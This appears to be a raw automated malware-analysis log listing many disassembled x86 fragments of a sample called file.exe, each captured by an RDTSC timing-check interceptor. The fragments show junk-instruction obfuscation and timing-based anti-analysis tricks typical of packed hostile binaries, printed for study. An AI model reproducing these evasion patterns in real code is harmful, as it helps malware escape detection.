Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6003B second address: 4C60090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, B8CDh 0x0000000f jmp 00007F08C0CB452Ah 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F08C0CB4530h 0x0000001c push FFFFFFFEh 0x0000001e pushad 0x0000001f mov ax, A1ADh 0x00000023 pushad 0x00000024 mov edi, esi 0x00000026 mov ecx, 039182EBh 0x0000002b popad 0x0000002c popad 0x0000002d push 34987767h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60090 second address: 4C60096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60096 second address: 4C6009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6009C second address: 4C600A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600A0 second address: 4C600A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600A4 second address: 4C600DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 420226E1h 0x0000000f jmp 00007F08C0C91969h 0x00000014 push 58F6A63Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F08C0C9195Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600DD second address: 4C600F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1D9E8531h 0x00000010 pushad 0x00000011 pushad 0x00000012 mov bl, ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600F9 second address: 4C6015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr fs:[00000000h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F08C0C9195Ch 0x00000019 add si, 7298h 0x0000001e jmp 00007F08C0C9195Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F08C0C91968h 0x0000002a jmp 00007F08C0C91965h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6015A second address: 4C6018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F08C0CB452Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F08C0CB452Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6018F second address: 4C601B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08C0C91965h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C601B6 second address: 4C60245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007F08C0CB452Eh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F08C0CB4530h 0x00000017 push eax 0x00000018 jmp 00007F08C0CB452Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F08C0CB4536h 0x00000023 xchg eax, esi 0x00000024 jmp 00007F08C0CB4530h 0x00000029 push eax 0x0000002a jmp 00007F08C0CB452Bh 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F08C0CB4535h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60245 second address: 4C6028D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F08C0C9195Eh 0x0000000f push eax 0x00000010 jmp 00007F08C0C9195Bh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F08C0C91965h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6028D second address: 4C602AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [769B4538h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, cx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602AF second address: 4C602B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602B4 second address: 4C602F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F08C0CB4537h 0x0000000b jmp 00007F08C0CB4533h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xor dword ptr [ebp-08h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 19FF6206h 0x0000001f mov ebx, 221F9892h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602F9 second address: 4C602FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602FF second address: 4C60303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60303 second address: 4C60307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60307 second address: 4C6035B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a jmp 00007F08C0CB4537h 0x0000000f nop 0x00000010 jmp 00007F08C0CB4536h 0x00000015 push eax 0x00000016 pushad 0x00000017 push edi 0x00000018 mov edi, esi 0x0000001a pop ecx 0x0000001b mov dx, 394Ch 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F08C0CB452Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6035B second address: 4C603AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F08C0C91964h 0x00000013 and si, 57C8h 0x00000018 jmp 00007F08C0C9195Bh 0x0000001d popfd 0x0000001e call 00007F08C0C91968h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C603AE second address: 4C603F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr fs:[00000000h], eax 0x0000000c jmp 00007F08C0CB4537h 0x00000011 mov dword ptr [ebp-18h], esp 0x00000014 jmp 00007F08C0CB4536h 0x00000019 mov eax, dword ptr fs:[00000018h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edx, si 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C603F9 second address: 4C6040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91960h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6040D second address: 4C60411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60411 second address: 4C6042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [eax+00000FDCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F08C0C9195Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6042B second address: 4C60431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60431 second address: 4C60435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60435 second address: 4C6048E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F08C0CB4532h 0x00000013 jmp 00007F08C0CB4535h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F08C0CB4530h 0x0000001f sub si, B608h 0x00000024 jmp 00007F08C0CB452Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6048E second address: 4C604A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91964h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604A6 second address: 4C604AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604AA second address: 4C604BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F08C0C919B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604BE second address: 4C604C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604C2 second address: 4C604C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604C8 second address: 4C60504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 6944h 0x00000007 mov bl, D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F08C0CB4531h 0x00000017 xor cx, 8936h 0x0000001c jmp 00007F08C0CB4531h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60504 second address: 4C60509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60509 second address: 4C60527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F08C0CB452Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60527 second address: 4C60536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60536 second address: 4C60566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 jmp 00007F08C0CB4530h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test ecx, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F08C0CB452Dh 0x00000018 mov cx, 11D7h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50207 second address: 4C50223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91968h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50223 second address: 4C50227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50227 second address: 4C50239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov edx, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50239 second address: 4C502E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, DDh 0x00000005 call 00007F08C0CB452Ah 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 2Ch 0x00000011 pushad 0x00000012 pushad 0x00000013 mov ebx, 3D686900h 0x00000018 jmp 00007F08C0CB4539h 0x0000001d popad 0x0000001e popad 0x0000001f push esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F08C0CB4538h 0x00000027 adc si, B9A8h 0x0000002c jmp 00007F08C0CB452Bh 0x00000031 popfd 0x00000032 jmp 00007F08C0CB4538h 0x00000037 popad 0x00000038 mov dword ptr [esp], ebx 0x0000003b jmp 00007F08C0CB4530h 0x00000040 xchg eax, edi 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F08C0CB4537h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502E3 second address: 4C502E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502E9 second address: 4C502ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502ED second address: 4C502F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C502F1 second address: 4C50303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e movsx ebx, cx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50303 second address: 4C50309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50309 second address: 4C5030D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5030D second address: 4C5031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f mov cl, 71h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50394 second address: 4C50410 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 638ADE06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test al, al 0x0000000c jmp 00007F08C0CB452Dh 0x00000011 je 00007F08C0CB470Bh 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F08C0CB452Ah 0x0000001f xor si, 8CA8h 0x00000024 jmp 00007F08C0CB452Bh 0x00000029 popfd 0x0000002a mov bx, cx 0x0000002d popad 0x0000002e mov ax, 0EBBh 0x00000032 popad 0x00000033 lea ecx, dword ptr [ebp-14h] 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F08C0CB452Ch 0x0000003d sub ah, 00000008h 0x00000040 jmp 00007F08C0CB452Bh 0x00000045 popfd 0x00000046 popad 0x00000047 mov dword ptr [ebp-14h], edi 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F08C0CB4530h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50410 second address: 4C50416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50416 second address: 4C5041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50438 second address: 4C5043E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5043E second address: 4C50444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50444 second address: 4C50448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50448 second address: 4C5044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C504E7 second address: 4C50550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 call 00007F08C0C91963h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test eax, eax 0x00000011 jmp 00007F08C0C9195Fh 0x00000016 jg 00007F093299F8CDh 0x0000001c jmp 00007F08C0C91966h 0x00000021 js 00007F08C0C919B7h 0x00000027 jmp 00007F08C0C91960h 0x0000002c cmp dword ptr [ebp-14h], edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50550 second address: 4C50554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50554 second address: 4C50571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50571 second address: 4C50577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50577 second address: 4C5057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5057B second address: 4C505C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F09329C243Eh 0x0000000e jmp 00007F08C0CB452Fh 0x00000013 mov ebx, dword ptr [ebp+08h] 0x00000016 jmp 00007F08C0CB4536h 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F08C0CB452Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505C2 second address: 4C505C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505C8 second address: 4C505DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, cx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505DB second address: 4C505E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505E0 second address: 4C505F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0CB4534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505F8 second address: 4C505FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C505FC second address: 4C50637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F08C0CB452Eh 0x0000000e xchg eax, esi 0x0000000f jmp 00007F08C0CB4530h 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F08C0CB452Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50637 second address: 4C5063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5063C second address: 4C5066E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08C0CB4534h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5066E second address: 4C5069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C9195Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F08C0C9195Dh 0x00000015 jmp 00007F08C0C9195Bh 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5069F second address: 4C506B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0CB4532h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C506B6 second address: 4C506D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F08C0C9195Eh 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50748 second address: 4C5074E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5074E second address: 4C50752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50752 second address: 4C50756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50756 second address: 4C5002E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F08C0C91960h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov dx, cx 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F08C0C91969h 0x0000001c or ecx, 117EC716h 0x00000022 jmp 00007F08C0C91961h 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a je 00007F093299F800h 0x00000030 xor eax, eax 0x00000032 jmp 00007F08C0C6B08Ah 0x00000037 pop esi 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a leave 0x0000003b retn 0004h 0x0000003e nop 0x0000003f mov edi, eax 0x00000041 cmp edi, 00000000h 0x00000044 setne al 0x00000047 xor ebx, ebx 0x00000049 test al, 01h 0x0000004b jne 00007F08C0C91957h 0x0000004d jmp 00007F08C0C91A49h 0x00000052 call 00007F08C4F390D0h 0x00000057 mov edi, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F08C0C91969h 0x00000062 jmp 00007F08C0C9195Bh 0x00000067 popfd 0x00000068 pushad 0x00000069 popad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5002E second address: 4C50034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50034 second address: 4C50061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F08C0C9195Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
